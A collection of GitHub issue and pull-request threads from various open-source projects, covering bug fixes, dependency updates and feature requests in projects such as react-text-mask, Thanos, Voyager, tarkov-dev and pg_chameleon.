I did have one question though. I know "pledged" opportunities do not include fees, but are "closed won" opportunities supposed to have the fee if selected? also noting that the fee was correctly reported on stripe.
Thanks for reviewing @djpeacher... I was able to resolve this issue by forcing the first invoice tied to the subscription to finalize and pay out before updating the opportunity. The other subscriptions do this automatically, but since these circle subscriptions use scheduled subscriptions to set an end date for the subscription, the first invoice is handled a little differently for whatever reason.
|
gharchive/pull-request
| 2023-07-21T12:57:48 |
2025-04-01T04:36:03.839475
|
{
"authors": [
"ashley-hebler",
"matthewdylan"
],
"repo": "texastribune/donations",
"url": "https://github.com/texastribune/donations/pull/1088",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
328974329
|
Fix deleting "static" chars for react text mask (#230, #483, #778 etc.)
Remove unnecessary componentDidUpdate
Add PureComponent for unnecessary re-render
Add test for correct deleting "static" chars
I've tested my solution in my own project and with all examples from the website.
The problem was the unnecessary mask-value update after a re-render: textMaskInputElement.update() is first called in the onChange method, and then called again in componentDidUpdate.
The tree of calls:
StatefulComponent.render()
MaskedInput.render()
MaskedInput.componentDidMount() (where calls textMaskInputElement.update() in initTextMask)
Make changes in input
MaskedInput.onChange(event) (calls textMaskInputElement.update())
StatefulComponent.onChange() (calls setState)
StatefulComponent.render()
MaskedInput.render()
MaskedInput.componentDidUpdate() (which calls textMaskInputElement.update() in initTextMask) // and this step is unnecessary, because we already applied the mask update in the onChange event
I hope that's a clear explanation; if not, feel free to ask for clarification :)
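The double update described in the call tree can be modeled without React at all. This is a hypothetical plain-JS model, not the library's actual code; `update()` stands in for textMaskInputElement.update():

```javascript
// Minimal model of the lifecycle above: before the fix, the mask was
// applied once in onChange and then re-applied in componentDidUpdate.
class MaskedInputModel {
  constructor(reinitOnUpdate) {
    this.reinitOnUpdate = reinitOnUpdate; // true = pre-fix behavior
    this.updates = 0;
  }
  update() { this.updates += 1; }        // stands in for textMaskInputElement.update()
  componentDidUpdate() {
    // Before the fix, initTextMask was re-run here, calling update() again.
    if (this.reinitOnUpdate) this.update();
  }
  onChange() {
    this.update();             // mask applied here, in the change handler
    this.componentDidUpdate(); // parent setState triggers a re-render
  }
}

const before = new MaskedInputModel(true);
before.onChange(); // update() runs twice: the redundant second call
                   // re-applies the mask and restores deleted "static" chars

const after = new MaskedInputModel(false);
after.onChange();  // update() runs exactly once
```

Removing the redundant re-initialization in componentDidUpdate leaves exactly one mask application per change, which is why the "static" characters stay deleted.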
Pulled down your branch and can confirm it fixes the problem for our project as well. Thank you 👍 😄 💃
@mzedeler @lozjackson could you take a look at my PR and give your opinion?
At the moment react-text-mask installs from my branch with that fix, but I would like to install it from the npm registry, like other users do :)
Thank you!
Thanks for your contribution!
I have taken a look at the code and haven't seen anything that looks wrong. It would be nice if you could find out if there are any other scenarios that would benefit from react testing, but if the answer is "no", then I think we should merge this fix.
@mzedeler I see one more problem, but it is not as critical as the one I already fixed.
The other problem, as I see it, is that the value in onChange(event) (event.target.value) differs from the value in the input element after textMaskInputElement.update():
Initial (123) 4
Delete 4
event.target.value === "(123) "
After textMaskInputElement.update(), input.value === "(123", but event.target.value stays "(123) "
That's not critical, but it can surprise some developers :)
I would like to make a separate PR for that...
Maybe just add a note in the documentation for this?
Yeap, note in the documentation is a good idea!
Could you include the change to the documentation in this PR?
LGTM :-)
@lozjackson?
@lozjackson yes, sure, I will do what you propose, but in a few days, as I have a lot of work right now :(
@lozjackson is it OK now?
|
gharchive/pull-request
| 2018-06-04T09:21:38 |
2025-04-01T04:36:03.894000
|
{
"authors": [
"DTupalov",
"miketamis",
"mzedeler"
],
"repo": "text-mask/text-mask",
"url": "https://github.com/text-mask/text-mask/pull/801",
"license": "Unlicense",
"license_type": "permissive",
"license_source": "github-api"
}
|
662340113
|
Updates for Powergate changes
Updating in preparation for https://github.com/textileio/powergate/pull/526 to get merged
Almost all changes are in generated files under docs/powergate/cli so look for the files not in that folder for real updates
|
gharchive/pull-request
| 2020-07-20T22:42:39 |
2025-04-01T04:36:03.899095
|
{
"authors": [
"asutula"
],
"repo": "textileio/docs",
"url": "https://github.com/textileio/docs/pull/195",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
450399719
|
ipfs.metrics.scope error -> TODO: mock repo
When adding files, I see this with the new App based IPFS setup:
08:47:14.800 ERROR core: failure on stop: context canceled; TODO: mock repo builder.go:36
This doesn't seem to cause any other issues... just a noisy error in the logs. The context is always related to "ipfs.metrics.scope":
Actually, this is happening because I'm using the HashOnly setting when adding data at one point during the sync process. This causes this mock repo to be constructed: https://github.com/ipfs/go-ipfs/blob/master/core/coreapi/unixfs.go#L64. When it's no longer needed, I'm guessing Close is called on it, which returns this TODO err to the mock node's error channel.
Still harmless, just good to know the actual cause. We should probably PR to go-ipfs a change that either removes the error or otherwise makes it more obvious to users who just want to use the hash only option of add.
|
gharchive/issue
| 2019-05-30T16:41:23 |
2025-04-01T04:36:03.901828
|
{
"authors": [
"sanderpick"
],
"repo": "textileio/go-textile",
"url": "https://github.com/textileio/go-textile/issues/800",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
830361479
|
Pow 2.3.1
Updates to the new Powergate release 2.3.1, adding miner index and "deals since" APIs. Updates all out-of-date dependencies (except for the ipfs http client cc @carsonfarmer... tried and had all sorts of typescript errors).
cc @jsign just as an FYI.
|
gharchive/pull-request
| 2021-03-12T18:48:54 |
2025-04-01T04:36:03.903153
|
{
"authors": [
"asutula"
],
"repo": "textileio/js-powergate-client",
"url": "https://github.com/textileio/js-powergate-client/pull/368",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1678443124
|
Page - divider of verses
#334
@Valyukhov
|
gharchive/pull-request
| 2023-04-21T12:28:26 |
2025-04-01T04:36:03.940403
|
{
"authors": [
"foxprogs"
],
"repo": "texttree/v-cana",
"url": "https://github.com/texttree/v-cana/pull/343",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
2752496497
|
add documentation for using the exporter in a docker environment
📋 Changes
🧪 Testing
📚 References
Thank you for your contribution!
|
gharchive/pull-request
| 2024-12-20T11:01:56 |
2025-04-01T04:36:03.945227
|
{
"authors": [
"Mbaoma",
"tfadeyi"
],
"repo": "tfadeyi/auth0-simple-exporter",
"url": "https://github.com/tfadeyi/auth0-simple-exporter/pull/235",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1260856477
|
Define a repo for rules
Dont reinvent the wheel...
...and let users contribute their rules to a separate repo / website.
Solution
Define some rules (naming, file endings, utf-8, etc. pp)
Gather some volunteers to check for malicious code.
Create a website with search, filters, and ratings
Profit ;D
Possible match in your Roadmap https://github.com/tfeldmann/organize/projects/4#card-25088440
Good idea. Creating a website for this is a bit too much but a folder with some predefined rules would certainly be useful and could live in this repository. Goes on the todo list.
I'm having a hard time defining what these predefined rules might look like. Maybe something like snippets?
description: "Filters images containing GPS information"
type: "filter"
---
- exif: gps.gpsdate
description: "Recursively delete all empty directories"
type: "rule"
---
rules:
- locations: "__placeholder__"
targets: dirs
subfolders: true
filters:
- empty
actions:
- delete
Any good ideas?
I haven't fully thought this through, but one idea might be to allow these standalone rules to be 'include'd into the main config, and you pass any required variables to it
So your generic 'blueprint' might be defined as..
description: "Recursively delete all empty directories"
type: "blueprint"
---
rules:
- locations: "{{ vars.dir }}"
targets: dirs
subfolders: true
filters:
- empty
actions:
- delete
and then you include the blueprint from your main config like...
description: "Recursively delete all empty directories"
type: "rule"
include:
file: blueprints/recursively_delete.yml
vars:
- dir: ~/Desktop/some_dir
It could then generate an error if vars.dir was not defined
|
gharchive/issue
| 2022-06-04T17:55:06 |
2025-04-01T04:36:03.953503
|
{
"authors": [
"carpii",
"rafo",
"tfeldmann"
],
"repo": "tfeldmann/organize",
"url": "https://github.com/tfeldmann/organize/issues/217",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
378313060
|
fixed a bug where an empty rules file did not result in the proper error message
fixed a bug where an empty rules file did not result in the proper error message
Thank you!
|
gharchive/pull-request
| 2018-11-07T14:33:08 |
2025-04-01T04:36:03.954850
|
{
"authors": [
"mope1",
"tfeldmann"
],
"repo": "tfeldmann/organize",
"url": "https://github.com/tfeldmann/organize/pull/20",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
1974079903
|
TBLFM from formulas.md not working :open_mouth:
using example from here:
https://github.com/tgrosinger/md-advanced-tables/blob/main/docs/formulas.md
It's not working at all, in any of those view modes.
obsidian 1.4.16
advanced tables 0.19.1
plugins:
[
"obsidian-advanced-uri",
"auto-classifier",
"auto-glossary",
"canvas-filter",
"obsidian-checklist-plugin",
"code-styler",
"copilot",
"obsidian-custom-frames",
"dataview",
"obsidian-day-planner",
"obsidian-dictionary-plugin",
"cm-editor-syntax-highlight-obsidian",
"obsidian-find-and-replace-in-selection",
"obsidian-full-calendar",
"homepage",
"obsidian-kanban",
"obsidian-linter",
"mermaid-tools",
"obsidian-mind-map",
"nldates-obsidian",
"oz-image-plugin",
"periodic-notes",
"obsidian-read-it-later",
"obsidian-reminder-plugin",
"obsidian-rollover-daily-todos",
"tag-wrangler",
"obsidian-tagfolder",
"obsidian-tasks-plugin",
"obsidian-version-history-diff",
"obsidian-task-archiver",
"obsidian-pandoc",
"obsidian-regex-replace",
"quickadd",
"omnisearch",
"obsidian-auto-link-title",
"obisidian-note-linker",
"obsidian-latex",
"obsidian-emoji-toolbar",
"dbfolder",
"table-editor-obsidian"
]
[
"file-explorer",
"global-search",
"switcher",
"graph",
"backlink",
"canvas",
"outgoing-link",
"tag-pane",
"page-preview",
"templates",
"note-composer",
"command-palette",
"editor-status",
"bookmarks",
"outline",
"word-count",
"file-recovery",
"sync"
]
moved to https://github.com/tgrosinger/advanced-tables-obsidian/issues/299
|
gharchive/issue
| 2023-11-02T11:47:38 |
2025-04-01T04:36:03.997420
|
{
"authors": [
"axaluss"
],
"repo": "tgrosinger/md-advanced-tables",
"url": "https://github.com/tgrosinger/md-advanced-tables/issues/71",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
183516646
|
Fixing Travis to Allow plotting
Currently Travis is not configured to allow plotting via matplotlib and seaborn. Let's fix that.
I have found some resources that may be helpful:
matplotlib + travis
no display name error
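One common pattern from the linked resources (a sketch based on those resources, not on this repo's actual config) is to start a virtual framebuffer so matplotlib has a display on the headless CI machine:

```yaml
# .travis.yml fragment (sketch): give matplotlib a virtual display
before_script:
  - "export DISPLAY=:99.0"
  - "sh -e /etc/init.d/xvfb start"
  - sleep 3 # give xvfb time to start
```

Alternatively, selecting a non-interactive backend (e.g. matplotlib.use('Agg') before importing pyplot) avoids needing a display at all.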
Closing with PR #23.
|
gharchive/issue
| 2016-10-17T20:19:02 |
2025-04-01T04:36:04.001313
|
{
"authors": [
"charlesdrotar"
],
"repo": "tgsmith61591/skutil",
"url": "https://github.com/tgsmith61591/skutil/issues/22",
"license": "bsd-3-clause",
"license_type": "permissive",
"license_source": "bigquery"
}
|
1124035468
|
Link to documentation is wrong
The link to the documentation in the README.md file is wrong:
https://github.com/tguichaoua/promised-sqlite3/blob/befca59abd9f3a927aff4dc69736089c0aa040c9/README.md?plain=1#L61
I'm guessing the link should be:
https://tguichaoua.github.io/promised-sqlite3/
However, I didn't find what I was looking for there either. After having inserted a new post, I would like to retrieve the id the new post got. The docs say that run() returns a RunResult, but there's no documentation of what a RunResult is. But looking at the implementation, I can see it's this, so I'm guessing I can use runResult.lastID to obtain the id the post got. Maybe this can be clarified?
Otherwise this library seem to be precisely what I was looking for. Thank you!
The links may be broken since it's a pretty old project. Also I don't have time to maintain this project.
But you can open a PR to fix issues and I will publish a new release.
About the documentation: since this project is built on top of sqlite3, I did not want to re-write the documentation from sqlite3, so I just put a link. Also, if you think the documentation must be clarified, open a PR.
The RunResult is described here:
If execution was successful, the this object will contain two properties named lastID and changes which contain the value of the last inserted row ID and the number of rows affected by this query respectively. Note that lastID only contains valid information when the query was a successfully completed INSERT statement and changes only contains valid information when the query was a successfully completed UPDATE or DELETE statement. In all other cases, the content of these properties is inaccurate and should not be used. The .run() function is the only query method that sets these two values; all other query methods such as .all() or .get() don't retrieve these values.
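Based on the behavior quoted above, retrieving the inserted row id looks like the following. The `db` object here is a hypothetical stand-in that resolves the same { lastID, changes } shape that run() resolves to; with the real library you would open an actual database instead:

```javascript
// Stand-in for a promised run(): resolves { lastID, changes } the way
// node-sqlite3's .run() populates `this` on a successful INSERT.
const db = {
  rowCount: 0,
  run(sql, ...params) {
    this.rowCount += 1;
    return Promise.resolve({ lastID: this.rowCount, changes: 1 });
  },
};

async function insertPost(title) {
  const result = await db.run('INSERT INTO post (title) VALUES (?)', title);
  // lastID is only meaningful after a successfully completed INSERT
  return result.lastID;
}
```

So runResult.lastID is indeed the way to obtain the id the new post got, as guessed in the issue.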
|
gharchive/issue
| 2022-02-04T10:21:45 |
2025-04-01T04:36:04.123206
|
{
"authors": [
"PeppeL-G",
"tguichaoua"
],
"repo": "tguichaoua/promised-sqlite3",
"url": "https://github.com/tguichaoua/promised-sqlite3/issues/12",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
333754131
|
Error upon Running Minidot
Hello, I recently discovered minidot, and it seems like a very useful program. I am snagging an issue however. Whenever I run it I get the following error.
Loading required package: proto
[12:43:19] /home/pabster212/data/Programs/minimap2/minimap2 .. ok
[12:43:19] samtools .. ok
[12:43:19] prepping .. done
[12:45:00] mode: fast (2242694751 bp) "-L 500 -c 15"
[12:45:00] mapping .. failed
[ERROR] failed to open file '500'
[ERROR] failed to open file '500'
Any idea what this error could be? The command executed was ~/data/Programs/minidot/bin/minidot -M ~/data/Programs/minimap2/minimap2 -o test222.pdf A10.spades.contigs.fa ref.fa .
Hi @Jome0169, I came across a similar problem. I see that you are using minimap2 (not minimap, which is no longer developed). However, the default parameters added to the call to minimap by minidot internally (-L 500 -c 15) do not make sense for minimap2: -L has a totally different meaning now and does not take an argument. That is why minimap2 considers the 500 as a file name. So I see two possible solutions:
Use minimap
Use the -m option to provide parameters that work with minimap2
@iimog is right. minidot works with minimap, not minimap2. I haven't had the time yet to port it... It should however be possible to use the -m parameter to manually specify your minimap2 options and overwrite minidot's defaults, which don't make sense with minimap2 ...
|
gharchive/issue
| 2018-06-19T16:47:15 |
2025-04-01T04:36:04.127629
|
{
"authors": [
"Jome0169",
"iimog",
"thackl"
],
"repo": "thackl/minidot",
"url": "https://github.com/thackl/minidot/issues/10",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
183290996
|
Backporting some useful changes from the iOS branch
As part of creating the new 'fat' policy manager I needed some features from the iOS branch such as a wifi layer that used generations, an updated platform class, etc. I wanted to get these reviewed separately from the rest of the changes in thaliproject/Thali_CordovaPlugin#1274 to make for a less overwhelming code review.
This is just too much disruption to be worth moving back.
|
gharchive/issue
| 2016-10-16T20:54:20 |
2025-04-01T04:36:04.133294
|
{
"authors": [
"yaronyg"
],
"repo": "thaliproject/Thali_CordovaPlugin",
"url": "https://github.com/thaliproject/Thali_CordovaPlugin/issues/1331",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
496264213
|
Store: error parsing block
Thanos version used
thanos, version 0.7.0 (branch: HEAD, revision: c6eaf68bec32aefd280318eaef6121d6ddb20d10) build user: root@aa355daaf987 build date: 20190902-15:31:30 go version: go1.12.5
What happened
Thanos store couldn't present all the data we were expecting as we have months of data and only one day was being shown. After looking at the logs all our thanos store instances were showing an error when trying to read the meta.json file from some folders in the data directory. After inspecting the folders we confirmed that they were empty.
After the clean up of the empty folders store returned to its normal behaviour.
What you expected to happen
The folders should not be empty, so some process must have failed and the folders were not cleaned up. Also, thanos probably should keep reading the folders until a new healthy one is found so the query would be correctly processed.
How to reproduce it (as minimally and precisely as possible):
Couldn't reproduce the problem
Full logs to relevant components
level=warn ts=2019-09-20T09:53:44.795446173Z caller=bucket.go:325 msg="error parsing block range" block=01DN3WMQJ1EQM192SSTXSBPS4V err="read meta.json: open /mnt/prometheus/store/01DN3WMQJ1EQM192SSTXSBPS4V/meta.json: no such file or directory"
Anything else we need to know
We use azure blob storage with thanos.
We use store in our prd environment with thanos 0.6.0 and the problem hasn't happened.
thanos: uname -a
Linux thanos 3.10.0-957.12.1.el7.x86_64 #1 SMP Mon Apr 29 14:59:59 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Hello, seems like it was fixed by this: https://github.com/thanos-io/thanos/pull/1505. Please try out the newest (master) version! Shout loudly at me if it happens again with that commit.
Tested with the newest version and it seems to be solved! Thanks 😄
Yes, we are running it in production and the issue does not happen anymore.
Thanks for verifying!
|
gharchive/issue
| 2019-09-20T10:03:41 |
2025-04-01T04:36:04.141731
|
{
"authors": [
"FUSAKLA",
"GiedriusS",
"joaosilva15"
],
"repo": "thanos-io/thanos",
"url": "https://github.com/thanos-io/thanos/issues/1549",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
553468071
|
Use latest golang 1.13 docker image available
[ ] I added CHANGELOG entry for this change.
[ ] Change is not relevant to the end user.
I just deployed the new 0.12.0 and noticed the following:
Version: 0.12.0
GoVersion: go1.13.1
Did this PR miss something or is this intended?
@der-eismann very good catch, this is because of inconsistent usage of the CI images. Fix in https://github.com/thanos-io/thanos/pull/2440
|
gharchive/pull-request
| 2020-01-22T11:06:28 |
2025-04-01T04:36:04.144096
|
{
"authors": [
"der-eismann",
"squat",
"sylr"
],
"repo": "thanos-io/thanos",
"url": "https://github.com/thanos-io/thanos/pull/2025",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
807049205
|
stalebot: Add an exempt label to ignore issue that has a PR
This PR adds an exempt label to stalebot so it ignores issues with active PRs.
To mark an issue that has an active PR, maintainers should add a specific label: state: someone-working-on-it
The idea triggered in https://github.com/thanos-io/thanos/issues/3456
What do you think?
Those are all valid points. And I don't have the answers now. I need to spare some time on this and check what are the available options. Maybe we have a smarter stalebot? Or we can try to improve it on the upstream.
Now there is no better plan. But I agree it would be really good if we can automate this. For now, I would say let's try it!
|
gharchive/pull-request
| 2021-02-12T08:34:58 |
2025-04-01T04:36:04.146635
|
{
"authors": [
"kakkoyun",
"yeya24"
],
"repo": "thanos-io/thanos",
"url": "https://github.com/thanos-io/thanos/pull/3789",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
53594790
|
Update to task-closure-tools 0.1.9
Tests pass
task-closure-tools 0.1.9 addresses the empty src bug from
https://github.com/thanpolas/grunt-closure-tools/issues/67
Things seem to still compile well.
released 0.9.8 :8ball: @betaorbust thanks!
|
gharchive/pull-request
| 2015-01-07T03:50:12 |
2025-04-01T04:36:04.148822
|
{
"authors": [
"betaorbust",
"thanpolas"
],
"repo": "thanpolas/grunt-closure-tools",
"url": "https://github.com/thanpolas/grunt-closure-tools/pull/68",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
190554781
|
FIX - env function call in routes.php
Hello,
I propose not to use env() in routes but config().
There is a reason for the madness.
#106
Yeah, i understand in local but if you don't use the .env file in production, all is broken :'(
My use case : i put .env in production first time, i execute artisan config:cache then i delete the .env file.
I agree that the current solution does not work perfectly, but neither does this one.
I however can not figure out what a perfect solution would look like.
I myself would prefer a try-catch instead of this.
Or like this :
env('DB_CONNECTION', config('database.default'))
The thing that #106 tries to do is to only run the database call in routes if the system has been installed, which is the case when env('DB_CONNECTION') is not null. However, config('database.default') will never return null, not even when Voyager has not been installed.
Closing; however, still looking for another way to handle this.
|
gharchive/pull-request
| 2016-11-20T12:12:32 |
2025-04-01T04:36:04.164243
|
{
"authors": [
"InfinityWebMe",
"marktopper"
],
"repo": "the-control-group/voyager",
"url": "https://github.com/the-control-group/voyager/pull/185",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
394019591
|
Remove unnecessary relationship-code
The getRelationships method in BreadRelationshipParse and the whole HasRelationship trait rely on relationship-method names which we don't use/know.
Therefore it is not usable/useful, and I removed it completely.
Because of that, relationToLink() doesn't do anything either, so I removed everything related to it.
Side effect: $with in models is working again.
Fixes https://github.com/the-control-group/voyager/issues/3604 and fixes https://github.com/the-control-group/voyager/issues/2561
$with in models is working again.
Can anybody explain ?
@emptynick I think this is just code clean up. This PR just remove all the remaining code related to relationship with the use of Eager loading capabilities, which was not working (which had been deprecated i guess).
As I had stated it the comment is the issue:
https://github.com/the-control-group/voyager/issues/3604#issuecomment-427711651
"We have data in $item->type as 'relationship', but in $details->type we have value as 'belongsTo'."
This PR removes feature related to eager loading of the relation once and for all.
@DrudgeRajen "$with in Model" will not work for sure, Since we don't have any relationship defined on Model level and cant be eager loaded in any was possible.
This PR removes feature related to eager loading of the relationship once and for all.
Because all those features solely rely on relationship-method names. So it can't and will never work with the way we currently define relationships. Why keep it then?!
@DrudgeRajen "$with in Model" will not work for sure, Since we don't have any relationship defined on the Model level and cant be Eager loaded in any way possible.
If you define $with in your model it will work again. I can guarantee you that.
See issue #2561
@emptynick I understand $with will work, but what if a dev does not keep protected $with = ['methodname']? Then eager loading will not work? I think the methods that were removed were somehow handling these things, maybe in an older version.
$with is a feature of Laravel/Eloquent.
And because we query relationships directly through the foreign model (not through the method) we don't need to eager-load the relationship before.
|
gharchive/pull-request
| 2018-12-25T13:15:16 |
2025-04-01T04:36:04.172909
|
{
"authors": [
"DrudgeRajen",
"abhinav-rabbit",
"emptynick",
"ntuple"
],
"repo": "the-control-group/voyager",
"url": "https://github.com/the-control-group/voyager/pull/3836",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
1475311297
|
Ammo Graph Not Updating Based on Toggles
Describe the Issue
When using the "new" ammo chart toggles to hide/show ammo based on availability, the chart updates to hide some ammo, but the graph does not.
The "total damage" toggle affects the graph properly, so I would expect the "ignore settings" toggle to be the same
Expected Behavior
Expected that if "ignore settings" is off, unavailable ammo would be hidden on the above graph.
To Reproduce
Set low traders or turn off flea and toggle "ignore settings" on/off
Client
Desktop
Browser
Chrome
Relevant Console Log Output
No response
Extra Information
No response
I see this somewhat differently. Even if ammo is "unavailable" because you can't buy it directly from traders or craft it, it's still possible that you might find that ammo in raid and want to know its attributes.
I see this somewhat differently. Even if ammo is "unavailable" because you can't buy it directly from traders or craft it, it's still possible that you might find that ammo in raid and want to know its attributes.
As long as we have the "Ignore settings" toggle, I think that accounts for that use case.
My main want is, as a relatively shitty Tarkov player myself, figuring out: "At my current trader level, what's my best bang-for-buck ammo type?"
So, my 'desired' search would be the ability to filter the chart & list down to ammo that is purchasable by me at my current trade/flea unlock level, and then filter further by price so I can see what the available damage vs pen options available to me look like.
The pen range slider that was added is super helpful too, but that would probably be the 2nd or 3rd step I'd want to narrow down to the ammo type I'm looking to find a weapon and fill with it.
Can't that basically be achieved by sorting by cheapest price (ascending) and filtering by minimum penetration? Anything without a price sinks to the bottom of the list.
For the list at the bottom, that works well if I've already picked a caliber, or if I've set the upper/lower limit on pen relatively narrow.
But if I'm trying to also visually identify the range of pen vs damage across multiple calibers, it can get pretty cluttered.
To clarify though, this is also specifically about the graph updating, not the list at the bottom, where the only filters that affect it are the pen slider and caliber selector.
Fair enough. I'm not opposed to the feature if someone wants to code it and submit a PR.
@Reithan does this solve the issue? I made it so it just affects the graph, and only shows what you can buy with your traders.
@brjens The new "Trader Ammo" toggle is working with the graph as I wanted, although the "Ignore Settings" toggle still seems to be working oddly? I don't see anything changing on the graph whether "Trader Ammo" is on or off.
|
gharchive/issue
| 2022-12-04T23:46:56 |
2025-04-01T04:36:04.205103
|
{
"authors": [
"Razzmatazzz",
"Reithan",
"brjens"
],
"repo": "the-hideout/tarkov-dev",
"url": "https://github.com/the-hideout/tarkov-dev/issues/278",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
2340910979
|
Show all trader offers per level
Includes barters in trader offers shown per level on the trader pages.
.deploy
|
gharchive/pull-request
| 2024-06-07T17:48:44 |
2025-04-01T04:36:04.206167
|
{
"authors": [
"Razzmatazzz"
],
"repo": "the-hideout/tarkov-dev",
"url": "https://github.com/the-hideout/tarkov-dev/pull/947",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
706139534
|
Created the about.js file displaying the info of the bot
Right now, it would work something like this.
@Chronos about
or
+about
So we still have to make it display the about result only by pinging. So I will work on that sometime soon. Pull requested anyway.
I think, as discussed on Discord, making the embed a bit cleaner would be preferred.
Along with responding on just a mention, you may have to use an event to do this
https://discord.js.org/#/docs/main/stable/class/Client?scrollTo=e-message
If what you want is the profile picture thumbnail in the embed, I can do it.
There's a few very minor things that would improve the looks of this greatly
Inline fields for prefix, contributors, uptime and ping
can be done with
{name: "**Prefix**", value: `${this.handler.prefix}`, inline: true},
Adding the profile picture thumbnail is perfect too, I've just noticed but it seems you've deleted the .env.example file too. Perhaps by mistake
Okay, I'll work on that.
Also, I apologize about the .env.example. I think we can close this PR and I'll open a new, updated one. That okay?
That works for me, one extra thing I think would help out with looks is to style the build info text, should be able to do it with something like
{name: "**Build info**", value: "```fix\nVersion: 0.0.0\nDiscord.js: v12.3.1\nDiscord Akairo: v8.2.0```"},
No worries about the .env.example - easy enough mistake to make
It looks like this now. Thanks for the suggestions, it looks much cleaner now.
Missed a few other things mentioned on the Discord channel, so here they are, updated as well.
Looking great!
Closing PR because I'm creating a new updated one.
|
gharchive/pull-request
| 2020-09-22T07:19:39 |
2025-04-01T04:36:04.219617
|
{
"authors": [
"DracTheDino",
"Moe-Szyslak"
],
"repo": "the-programmers-hangout/Chronos",
"url": "https://github.com/the-programmers-hangout/Chronos/pull/11",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1150972887
|
MySQL read daemon fails with decoding error
Describe the bug
When following the example usage from the documentation, when running chameleon start_replica, the program will fail with LookupError: unknown encoding: utf8mb3 (Full log attached below).
To Reproduce
Run MariaDB and PostgreSQL containers using the Docker Compose
Create a table and insert rows in MariaDB
Follow the usage example
Expected behavior
The replication starts successfully.
Environment(please complete the following information):
OS: NixOS + Docker
MySQL Version: 10.6.5-MariaDB-1:10.6.5+maria~focal-log
PostgreSQL Version: 13.6
Python Version: 3.9.6
Additional context
2022-02-26 00:26:14 MainProcess DEBUG pg_lib.py (660): Changing the autocommit flag to True
2022-02-26 00:26:14 MainProcess DEBUG pg_lib.py (660): Changing the autocommit flag to True
2022-02-26 00:26:14 MainProcess DEBUG pg_lib.py (660): Changing the autocommit flag to True
2022-02-26 00:26:14 MainProcess INFO global_lib.py (617): Checking if the replica for source mysql is stopped
2022-02-26 00:26:14 MainProcess INFO global_lib.py (627): Cleaning not processed batches for source mysql
2022-02-26 00:26:14 MainProcess DEBUG pg_lib.py (3239): Cleaning table t_log_replica_mysql_1
2022-02-26 00:26:14 MainProcess DEBUG pg_lib.py (3239): Cleaning table t_log_replica_mysql_2
2022-02-26 00:26:14 MainProcess INFO global_lib.py (558): Starting the replica daemons for source mysql
2022-02-26 00:26:14 MainProcess DEBUG global_lib.py (567): Replica process for source mysql is running
2022-02-26 00:26:14 MainProcess DEBUG pg_lib.py (660): Changing the autocommit flag to True
2022-02-26 00:26:14 read_replica DEBUG pg_lib.py (660): Changing the autocommit flag to True
2022-02-26 00:26:14 replay_replica DEBUG pg_lib.py (660): Changing the autocommit flag to True
2022-02-26 00:26:14 MainProcess DEBUG pg_lib.py (1277): Cleaning replayed batches for source mysql older than 1 day
2022-02-26 00:26:14 read_replica DEBUG pg_lib.py (680): There is already a database connection active.
2022-02-26 00:26:14 read_replica DEBUG pg_lib.py (3111): Collecting schema mappings for source mysql
2022-02-26 00:26:14 read_replica DEBUG mysql_lib.py (1463): Batch data [(12, 'mysql-bin.000003', 469495347, 't_log_replica_mysql_1', None)]
2022-02-26 00:26:14 read_replica DEBUG mysql_lib.py (1011): collecting table type map
2022-02-26 00:26:14 read_replica DEBUG mysql_lib.py (1228): GTID DISABLED - log_file mysql-bin.000003, log_position 469495347. id_batch: 12
2022-02-26 00:26:14 read_replica DEBUG mysql_lib.py (1242): ROTATE EVENT - binlogfile mysql-bin.000003, position 469495347.
2022-02-26 00:26:15 MainProcess ERROR global_lib.py (571): Read process alive: False - Replay process alive: True
2022-02-26 00:26:15 MainProcess ERROR global_lib.py (572): Stack trace: Traceback (most recent call last):
File "/home/ldesgoui/db/rewrite/venv/lib/python3.9/site-packages/pg_chameleon/lib/global_lib.py", line 500, in read_replica
self.mysql_source.read_replica()
File "/home/ldesgoui/db/rewrite/venv/lib/python3.9/site-packages/pg_chameleon/lib/mysql_lib.py", line 1464, in read_replica
replica_data=self.__read_replica_stream(batch_data)
File "/home/ldesgoui/db/rewrite/venv/lib/python3.9/site-packages/pg_chameleon/lib/mysql_lib.py", line 1322, in __read_replica_stream
for row in binlogevent.rows:
File "/home/ldesgoui/db/rewrite/venv/lib/python3.9/site-packages/pymysqlreplication/row_event.py", line 443, in rows
self._fetch_rows()
File "/home/ldesgoui/db/rewrite/venv/lib/python3.9/site-packages/pymysqlreplication/row_event.py", line 438, in _fetch_rows
self.__rows.append(self._fetch_one_row())
File "/home/ldesgoui/db/rewrite/venv/lib/python3.9/site-packages/pymysqlreplication/row_event.py", line 491, in _fetch_one_row
row["values"] = self._read_column_data(self.columns_present_bitmap)
File "/home/ldesgoui/db/rewrite/venv/lib/python3.9/site-packages/pymysqlreplication/row_event.py", line 138, in _read_column_data
values[name] = self.__read_string(2, column)
File "/home/ldesgoui/db/rewrite/venv/lib/python3.9/site-packages/pymysqlreplication/row_event.py", line 234, in __read_string
string = string.decode(encoding)
LookupError: unknown encoding: utf8mb3
2022-02-26 00:26:15 MainProcess ERROR global_lib.py (578): Read daemon crashed. Terminating the replay daemon.
